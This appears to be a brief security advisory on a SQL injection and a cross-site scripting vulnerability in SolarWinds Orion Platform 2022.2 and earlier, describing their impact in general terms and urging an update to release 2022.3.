In the Solarwinds Orion platform, which is an IT management and monitoring solution, two critical security vulnerabilities have been identified that may cause threat actors to access sensitive/critical data and execute code on the vulnerable system.
- The SQL Injection vulnerability with code CVE-2022-36961 is caused by insufficient cleaning of user-supplied data. As a result, a remote user can run arbitrary SQL commands in the application database by sending a specially crafted request to the affected application. Successful exploitation of this vulnerability allows remote threat actors to read, delete, modify data in the database and gain full control over the affected application.
- The security vulnerability code CVE-2022-36965 is also caused by insufficient cleaning of user-supplied data and allows a remote threat actor to perform cross-site scripting (XSS) attacks. A remote threat actor can exploit the vulnerability to inject arbitrary HTML and script code into the user’s browser in the context of the vulnerable website. Successful exploitation of the vulnerability allows remote threat actors to gain access to sensitive information, alter the appearance of the affected web page, and carry out phishing and malware attacks.
These vulnerabilities affect all versions of Solarwind Orion Platform 2022.2 and earlier and have been fixed with the latest SolarWinds Platform 2022.3 release. In this context, it is recommended to implement the security updates published immediately in order not to be the target of potential attacks that can be carried out using vulnerabilities.